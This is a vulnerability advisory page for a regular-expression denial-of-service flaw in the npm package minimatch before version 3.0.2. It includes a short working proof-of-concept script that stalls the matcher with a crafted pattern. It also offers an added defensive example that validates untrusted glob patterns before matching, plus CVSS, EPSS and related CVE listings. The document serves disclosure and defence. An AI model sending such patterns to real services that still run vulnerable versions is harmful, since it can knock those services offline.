exploitDog

GHSA-hxm2-r34f-qmc5

Published: Oct 9, 2018
Source: github
GitHub: reviewed
CVSS3: 7.5

Description

Regular Expression Denial of Service in minimatch

Affected versions of minimatch are vulnerable to regular expression denial of service attacks when user input is passed into the pattern argument of minimatch(path, pattern).

Proof of Concept

```javascript
var minimatch = require("minimatch");

// utility function for generating long strings
var genstr = function (len, chr) {
  var result = "";
  for (var i = 0; i <= len; i++) {
    result = result + chr;
  }
  return result;
};

// minimatch exploit: an unterminated character class followed by about a million backslashes
var exploit = "[!" + genstr(1000000, "\\") + "A";

console.log("starting minimatch");
minimatch("foo", exploit);
console.log("finishing minimatch");
```

Recommendation

Update to version 3.0.2 or later.
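A defensive pattern gate, added here as an example (it is not from the advisory or the minimatch project): untrusted input is validated before it ever reaches the glob library, so a pattern shaped like the proof of concept above is refused up front rather than compiled. The names `validatePattern`, `safeMatch`, `globToRegExp` and `simpleGlobMatch`, the limit `MAX_PATTERN_LENGTH` and the allowed alphabet are all assumptions of this example; `simpleGlobMatch` is a constructed stand-in for minimatch so the code runs offline, and in a real service you would inject minimatch 3.0.2 or later as the `match` argument.

```javascript
'use strict';

// Added example, not code from the advisory or the minimatch project.
// The limits below are constructed for this example (assumptions, not minimatch's own values).
const MAX_PATTERN_LENGTH = 1024;
// Conservative glob alphabet: letters, digits, _ . / * ? [ ] ! { } - ,
// Backslash is deliberately absent, so escape-heavy input is refused outright.
const ALLOWED_PATTERN = /^[A-Za-z0-9_.\/*?[\]!{}\-,]*$/;

// Gate for untrusted patterns: type, length and character-set checks, in that order.
function validatePattern(pattern) {
  if (typeof pattern !== 'string') {
    return { ok: false, reason: 'pattern must be a string' };
  }
  if (pattern.length > MAX_PATTERN_LENGTH) {
    return { ok: false, reason: 'pattern longer than ' + MAX_PATTERN_LENGTH + ' characters' };
  }
  if (!ALLOWED_PATTERN.test(pattern)) {
    return { ok: false, reason: 'pattern contains characters outside the allowed glob alphabet' };
  }
  return { ok: true, reason: null };
}

// Constructed stand-in for minimatch (hypothetical and far less capable):
// '*' matches a run of non-slash characters, '?' one non-slash character, and
// everything else (including '[' and ']') is matched literally. Runs of '*' are
// collapsed so the generated RegExp never contains two adjacent quantifiers.
function globToRegExp(pattern) {
  let src = '';
  let prevStar = false;
  for (const ch of pattern) {
    if (ch === '*') {
      if (!prevStar) src += '[^/]*';
      prevStar = true;
      continue;
    }
    prevStar = false;
    if (ch === '?') src += '[^/]';
    else src += ch.replace(/[.+^${}()|[\]\\]/g, '\\$&');
  }
  return new RegExp('^' + src + '$');
}

function simpleGlobMatch(path, pattern) {
  return globToRegExp(pattern).test(path);
}

// Validate first, then delegate to the real matcher (minimatch in production).
// A rejected pattern never reaches the matcher, so no RegExp is built from it.
function safeMatch(path, pattern, match = simpleGlobMatch) {
  const verdict = validatePattern(pattern);
  if (!verdict.ok) {
    return { matched: false, rejected: true, reason: verdict.reason };
  }
  return { matched: match(path, pattern), rejected: false, reason: null };
}

// Constructed inputs: a benign pattern and one shaped like the advisory's proof of
// concept (shortened to 100000 backslashes; the shape, not the exact length, matters here).
const BENIGN_PATTERN = 'src/*.js';
const POC_SHAPED_PATTERN = '[!' + '\\'.repeat(100000) + 'A';

console.log(safeMatch('src/app.js', BENIGN_PATTERN));   // matched: true, rejected: false
console.log(safeMatch('foo', POC_SHAPED_PATTERN));       // matched: false, rejected: true
```

The gate is a complement to upgrading, not a substitute: the length cap and the restricted alphabet keep attacker-controlled patterns small and simple, while the upgrade fixes the parser itself for every pattern that does get through.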

Packages

| Name | Ecosystem | Affected versions | Fixed version |
| --- | --- | --- | --- |
| minimatch | npm | < 3.0.2 | 3.0.2 |

EPSS

Percentile: 62%
0.00435
Low

CVSS3

7.5 High

Weaknesses

CWE-400

Related vulnerabilities

CVSS3: 7.5
ubuntu
more than 7 years ago

Minimatch is a minimal matching utility that works by converting glob expressions into JavaScript `RegExp` objects. The primary function, `minimatch(path, pattern)` in Minimatch 3.0.1 and earlier is vulnerable to ReDoS in the `pattern` parameter.

CVSS3: 7.5
nvd
more than 7 years ago

Minimatch is a minimal matching utility that works by converting glob expressions into JavaScript `RegExp` objects. The primary function, `minimatch(path, pattern)` in Minimatch 3.0.1 and earlier is vulnerable to ReDoS in the `pattern` parameter.

CVSS3: 7.5
debian
more than 7 years ago

Minimatch is a minimal matching utility that works by converting glob ...